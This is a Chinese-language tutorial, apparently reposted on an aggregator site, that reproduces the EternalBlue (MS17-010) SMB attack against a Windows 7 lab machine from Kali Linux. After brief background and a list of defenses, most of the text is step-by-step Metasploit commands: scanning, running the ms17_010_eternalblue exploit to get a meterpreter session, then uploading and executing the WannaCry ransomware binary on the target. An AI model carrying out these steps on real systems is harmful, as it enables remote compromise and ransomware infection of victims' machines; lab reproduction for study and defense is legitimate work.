永恒之蓝全过程复现

这篇具有很好参考价值的文章主要介绍了永恒之蓝全过程复现。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

一,永恒之蓝简介

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

二,漏洞原理

永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

三,SMB协议

SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。

四,漏洞防御

1.禁用SMB1协议

2.打开Windows Update,或手动安装补丁

3.使用防火墙阻止445端口的连接,或者使用进/出站规则阻止445端口的连接

4.不要随意打开陌生的文件,链接

5.安装杀毒软件,及时更新病毒库

6.暂时关闭Server服务。

五,实验环境:Win7(靶机)和Kali Linux(攻击机);

1.准备靶机:Win7 64位 (IP: 192.168.227.136)--用ipconfig进行查询,实验前关闭win7防火墙(在win7的所有程序中的控制面板中设置)

2.准备攻击机:Kali 64位 (IP:192.168.227.132)--用ifconfig进行查询

3.保证两个虚拟机可以ping通

永恒之蓝,网络,运维,web安全,Powered by 金山文档
永恒之蓝,网络,运维,web安全,Powered by 金山文档

六,漏洞复现

1.检测靶机主机和端口

使用nmap对靶机端口服务进行扫描,检测目标主机是否存活,以及445端口开放情况

nmap 192.168.227.136
永恒之蓝,网络,运维,web安全,Powered by 金山文档

可以看到:目标主机存活(host is up),且445端口开放

2.打开kail自带的Metasploit渗透工具

(Metasploit是一款开源的安全漏洞检测工具,msfconsole用于启动msf终端)

msfconsole
永恒之蓝,网络,运维,web安全,Powered by 金山文档

3、输入永恒之蓝漏洞编号

永恒之蓝漏洞编号为ms17-010

search ms17-010
永恒之蓝,网络,运维,web安全,Powered by 金山文档

可以看到返回了多条可利用的漏洞模块信息,永恒之蓝用到的是第3个和第0个。第3个是用来进行扫描的,扫描在这个网段里面哪一个主机是有这个漏洞的(scanner扫描器),第0个是永恒之蓝的攻击模块。

4.使用第3个扫描器进行辅助扫描测试

use auxiliary/scanner/smb/smb_ms17_010
永恒之蓝,网络,运维,web安全,Powered by 金山文档

5.查看该漏洞模块所需的参数情况

show options
永恒之蓝,网络,运维,web安全,Powered by 金山文档

结果展示:其中required下方显示的值为yes的,代表是必须要设置的项;显示的值为no的,代表是不必须要设置的项;

我们重点关注以下2个参数配置,哪个参数有问题就设置哪个:

RHOST(被攻击的目标地址-靶机地址);

RPORT(被攻击目标地址的端口-保证445端口开放);

6、设置靶机地址

由上图可知:只有RHOST未设置,其他参数均以自动获取,没有问题。所以我们只需设置靶机位置即可

set RHOST 192.168.227.136
永恒之蓝,网络,运维,web安全,Powered by 金山文档

7、进行检验

show options
永恒之蓝,网络,运维,web安全,Powered by 金山文档

检验后无误即可进行下一步操作

8、发起攻击

run
永恒之蓝,网络,运维,web安全,Powered by 金山文档

显示“Host is likely VULNERABLE to MS17-010”-该主机很容易受到ms17-010的攻击,可以断定靶机存在永恒之蓝漏洞。

9、再次查看永恒之蓝漏洞

search ms17-010 
永恒之蓝,网络,运维,web安全,Powered by 金山文档

10、进入0模块,进行攻击

use exploit/windows/smb/ms17_010_eternalblue
永恒之蓝,网络,运维,web安全,Powered by 金山文档

11、查看参数配置情况

show options

重点关注以下5个参数设置,哪个有问题就设置哪个

1.Payload(攻击载体) ;

2.RHOST(被攻击的目标地址-靶机ip);

3.RPORT(被攻击目标地址的端口-保证445开放);

4.LHOST(发起攻击的地址-kali的ip);

5.LPORT(发起攻击的端口-默认即可);

永恒之蓝,网络,运维,web安全,Powered by 金山文档

发现仅RHOST为空待设置,其它(payload/RPORT/LHOST/LPORT)均已获取且正确

12、设置RHOST

set RHOST 192.168.227.136
永恒之蓝,网络,运维,web安全,Powered by 金山文档

13、再次检查

show options
永恒之蓝,网络,运维,web安全,Powered by 金山文档

检查无误

14,发起攻击

run
永恒之蓝,网络,运维,web安全,Powered by 金山文档

显示meterpreter >表明攻击成功 两个电脑已经建立了一个会话连接

15,进入靶机shell

shell
永恒之蓝,网络,运维,web安全,Powered by 金山文档

若有乱码,输入chcp 65001即可

16,将wcry勒索病毒解压至kail的root文件夹下

永恒之蓝,网络,运维,web安全,Powered by 金山文档

17,上传wcty.exe至靶机c盘

upload /root/wcry.exe c://wcry.exe
永恒之蓝,网络,运维,web安全,Powered by 金山文档

若输入该命令无效,可在写完upload后按空格 将上图中的wcry.exe拉入命令行(本人是这么做的)

18,运行wcry.exe

excute -f c://wcry.exe
永恒之蓝,网络,运维,web安全,Powered by 金山文档

运行成功

19,查看靶机

永恒之蓝,网络,运维,web安全,Powered by 金山文档

攻击完成!文章来源地址https://www.toymoban.com/news/detail-655220.html

到了这里,关于永恒之蓝全过程复现的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 永恒之蓝漏洞原理及漏洞复现

    摘要 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个

    2024年02月03日
    浏览(84)
  • 神经网络小结:训练的全过程

    这一节我们主要是将之前的知识穿起来,形成一个整体。如果之前的没看过可以回翻一下专栏。但是在整体回归之前,我们还需要学习一个小知识点——随机初始化 在神经网络中,我们大致的训练流程就是:通过前向传播得出当前 θ theta θ 下的假设结果,使用代价函数对比

    2024年02月10日
    浏览(42)
  • 永恒之蓝漏洞复现(ms17-010)

    永恒之蓝漏洞复现(ms17-010) 环境 信息收集 先扫描目标靶机IP 进入MSF查看是否存在永恒之蓝的漏洞 攻击 攻击机:kali 靶机:Windows Server 2008 对ip进行收集开放什么端口 先扫描目标靶机IP 因为在同一个内网之中 所以可以使用arp-scan -l 进行查询 知道目标靶机IP(192.168.162.146)来进

    2024年03月25日
    浏览(51)
  • 【ms17-010】永恒之蓝漏洞复现

    准备工作 攻击机:kali,ip:192.168.56.128 靶机:windows server 2003,ip:192.168.56.132 工具:nmap(扫描)、msf 漏洞利用 首先我们先在攻击机上使用nmap扫一下该网段主机的存活情况 此时已经扫描出来了,ip为: 192.168.56.132 的主机开启,并且显示了开放的端口号。 然后我们可以使用:

    2024年01月19日
    浏览(40)
  • 永恒之蓝(ms17-010)简介与复现

    永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲

    2024年02月10日
    浏览(48)
  • 永恒之蓝ms17_010漏洞复现

    攻击机:Linux kali(IP:192.168.52.132) 靶机:Windows 7(x64)(IP:192.168.52.130) 条件:靶机防火墙关闭,两台机子能够相互ping通,靶机445端口开启(永恒之蓝漏洞就是通过恶意代码扫描并攻击开放445端口的 Windows 主机)   登录 kali linux,用 nmap 探测本网段存活主机 nmap 192.168.5

    2024年02月11日
    浏览(38)
  • 漏洞复现_CVE-2017-0144 “永恒之蓝”漏洞

    (1)一台Windows电脑 (可以使用虚拟机代替) 配置是 网络—右键,属性----高级共享设置----启用文件和打印机共享 (可以理解为,这样设置才使其具有了“永恒之蓝”漏洞) (2)Metasploit任意平台 可以是Windows版,可以是kali自带版 1.何为CVE-2017-0144? ​ CVE-2017-0144 既 永恒之蓝最

    2024年02月04日
    浏览(48)
  • 《MS17-010(永恒之蓝)—漏洞复现及防范》

    作者: susususuao 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 - 永恒之蓝 永恒之蓝(Eternal Blue)是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。而SMB服务是一个协议名,它能被用于Web连接和客户端与服

    2024年02月06日
    浏览(86)
  • ms17-010(永恒之蓝) 漏洞复现与处理

    ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入

    2024年02月09日
    浏览(43)
  • MS17-010(永恒之蓝)漏洞分析与复现

    一、漏洞简介 1、永恒之蓝介绍: 永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广

    2024年02月02日
    浏览(39)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包